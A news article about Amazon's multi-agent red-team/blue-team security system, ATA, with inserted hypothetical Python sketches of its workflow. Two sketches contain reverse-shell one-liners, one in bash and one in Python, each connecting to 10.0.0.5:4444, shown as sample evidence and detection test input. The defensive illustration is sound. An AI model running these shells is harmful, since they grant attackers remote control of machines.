As generative AI pushes the speed of software development, it is also enhancing the ability of digital attackers to carry out financially motivated or state-backed hacks. This means that security teams at tech companies have more code than ever to review while facing even more pressure from bad actors. On Monday, Amazon will publish, for the first time, details of an internal system known as Autonomous Threat Analysis (ATA), which the company has been using to help its security teams proactively identify weaknesses in its platforms, perform variant analysis to quickly search for other, similar flaws, and then develop remediations and detection capabilities to plug holes before attackers find them.
ATA was born out of an internal Amazon hackathon in August 2024, and security team members say that it has grown into a crucial tool since then. The key concept underlying ATA is that it isn’t a single AI agent developed to comprehensively conduct security testing and threat analysis. Instead, Amazon developed multiple specialized AI agents that compete against each other in two teams to rapidly investigate real attack techniques and different ways they could be used against Amazon’s systems—and then propose security controls for human review.
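Amazon has not published ATA's implementation, but the competing-teams pattern it describes can be sketched in miniature. In this hypothetical illustration, a red-team agent enumerates attack-technique variants with supporting evidence, a blue-team agent proposes a detection for each, and only detections that validate against the evidence are queued for human review. All class and function names here are assumptions, not Amazon's.

```python
# Illustrative sketch only: Amazon has not published ATA's code.
# RedAgent, BlueAgent, Finding, and Detection are hypothetical names.
from dataclasses import dataclass

@dataclass
class Finding:
    technique: str
    evidence: list[str]   # log lines showing the technique actually ran

@dataclass
class Detection:
    technique: str
    rule: str             # proposed detection rule
    validated: bool = False

class RedAgent:
    """Proposes attack-technique variants against a test environment."""
    def __init__(self, base_techniques: list[str]):
        self.base = base_techniques

    def propose(self) -> list[Finding]:
        # A real system would mutate and combine techniques via an LLM;
        # here we enumerate variants deterministically for clarity.
        return [Finding(t, evidence=[f"log: executed {t}"]) for t in self.base]

class BlueAgent:
    """Writes detections and validates them against red-team telemetry."""
    def respond(self, finding: Finding) -> Detection:
        d = Detection(finding.technique, rule=f"alert on '{finding.technique}'")
        # A detection only counts if it fires on the recorded evidence.
        d.validated = any(finding.technique in line for line in finding.evidence)
        return d

def run_round(red: RedAgent, blue: BlueAgent) -> list[Detection]:
    """One red/blue round; only validated detections reach human review."""
    return [d for d in (blue.respond(f) for f in red.propose()) if d.validated]

review_queue = run_round(
    RedAgent(["python reverse shell", "cron persistence"]), BlueAgent()
)
```

The key design choice mirrored here is that the adversarial loop produces candidate controls, while a separate validation gate decides what humans ever see.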
“The initial concept was aimed to address a critical limitation in security testing—limited coverage and the challenge of keeping detection capabilities current in a rapidly evolving threat landscape,” Steve Schmidt, Amazon’s chief security officer, tells WIRED. “Limited coverage means you can’t get through all of the software or you can’t get to all of the applications because you just don’t have enough humans. And then it’s great to do an analysis of a set of software, but if you don’t keep the detection systems themselves up to date with the changes in the threat landscape, you’re missing half of the picture.”
As part of scaling its use of ATA, Amazon developed special “high-fidelity” testing environments that are deeply realistic reflections of Amazon’s production systems, so ATA can both ingest and produce real telemetry for analysis.
The company’s security teams also made a point of designing ATA so that every technique it employs, and every detection capability it produces, is validated with real, automatic testing and system data. Red-team agents working on attacks that could be used against Amazon’s systems execute actual commands in ATA’s special test environments, producing verifiable logs. Blue-team, or defense-focused, agents use real telemetry to confirm whether the protections they propose are effective. And anytime an agent develops a novel technique, it also pulls time-stamped logs to prove that its claims are accurate.
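The evidence requirement described above can be illustrated with a small, hypothetical verification gate: an agent's claim is accepted only if time-stamped telemetry backs it up. The function and field names are assumptions for illustration, not Amazon's actual schema.

```python
# Hypothetical sketch of an "evidence required" gate; not Amazon's code.
from datetime import datetime

def verify_claim(claimed_technique: str, telemetry: list[dict]) -> bool:
    """Accept an agent's claim only if time-stamped telemetry supports it."""
    for event in telemetry:
        if claimed_technique in event.get("command", ""):
            # Require a parseable timestamp so the evidence is auditable.
            try:
                datetime.fromisoformat(event["timestamp"])
            except (KeyError, ValueError):
                continue
            return True
    return False

logs = [{"timestamp": "2025-01-15T10:32:00+00:00",
         "command": "bash -i >& /dev/tcp/10.0.0.5/4444 0>&1"}]

backed = verify_claim("/dev/tcp", logs)   # claim matches a time-stamped log
unbacked = verify_claim("curl", logs)     # no supporting evidence, rejected
```

Gating every claim on observable, time-stamped evidence is what lets a system like this treat unverifiable agent output as noise rather than findings.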
This verifiability reduces false positives, Schmidt says, and acts as “hallucination management.” Because the system is built to demand certain standards of observable evidence, Schmidt claims that “hallucinations are architecturally impossible.”
The fact that ATA’s specialized agents work together in teams—each lending its expertise toward a larger goal—mimics the way that humans collaborate in security testing and defense development. The difference AI provides, says Amazon security engineer Michael Moran, is the power to rapidly generate new variations and combinations of offensive techniques and then propose remediations at a scale that is prohibitively time-consuming for humans alone.
“I get to come in with all the novel techniques and say, ‘I wonder if this would work?’ And now I have an entire scaffolding and a lot of the base stuff is taken care of for me” in investigating it, says Moran, who was one of the engineers who originally proposed ATA at the 2024 hackathon. “It makes my job way more fun but it also enables everything to run at machine speed.”
Schmidt notes, too, that ATA has already been extremely effective at looking at particular attack capabilities and generating defenses. In one example, the system focused on Python “reverse shell” techniques, used by hackers to manipulate target devices into initiating a remote connection to the attacker’s computer. Within hours, ATA had discovered new potential reverse shell tactics and proposed detections for Amazon’s defense systems that proved to be 100 percent effective.
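The detections ATA generated for reverse shells have not been published, but a simplified, defensive sketch shows what pattern-based detection of Python reverse shells can look like: flagging process command lines that combine a socket connection with duplicating the socket onto standard streams and spawning a shell. The patterns and threshold here are illustrative assumptions.

```python
# Illustrative detection sketch for Python reverse-shell patterns;
# the actual detections ATA produced have not been published.
import re

# Common reverse-shell markers: a socket connection, duplicating the
# socket onto stdin/stdout/stderr, and spawning an interactive shell.
REVERSE_SHELL_PATTERNS = [
    re.compile(r"socket\.socket\(.*\.connect\(", re.DOTALL),
    re.compile(r"os\.dup2\(\s*\w+\.fileno\(\)"),
    re.compile(r"pty\.spawn\(\s*['\"]/bin/(ba)?sh"),
]

def looks_like_reverse_shell(cmdline: str) -> bool:
    """Flag a command line that matches two or more shell markers."""
    hits = sum(1 for p in REVERSE_SHELL_PATTERNS if p.search(cmdline))
    return hits >= 2

sample = ("python -c \"import socket,os,pty;"
          "s=socket.socket();s.connect(('10.0.0.5',4444));"
          "os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);"
          "pty.spawn('/bin/sh')\"")

looks_like_reverse_shell(sample)           # multiple markers match
looks_like_reverse_shell("python app.py")  # benign command line
```

Requiring several independent markers, rather than any single string, is a common way to keep false positives down in detections like these.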
ATA does its work autonomously, but it uses a “human in the loop” methodology that requires input from a real person before actually implementing changes to Amazon’s security systems. And Schmidt readily concedes that ATA is not a replacement for advanced, nuanced human security testing. Instead, he emphasizes that by taking on the massive quantity of mundane, rote tasks involved in daily threat analysis, ATA gives human staff more time to work on complex problems.
The next step, he says, is to start using ATA in real-time incident response for faster identification and remediation in actual attacks on Amazon’s massive systems.
“AI does the grunt work behind the scenes. When our team is freed up from analyzing false positives, they can focus on real threats,” Schmidt says. “I think the part that’s most positive about this is the reception of our security engineers, because they see this as an opportunity where their talent is deployed where it matters most.”
The post Amazon Is Using Specialized AI Agents for Deep Bug Hunting appeared first on Wired.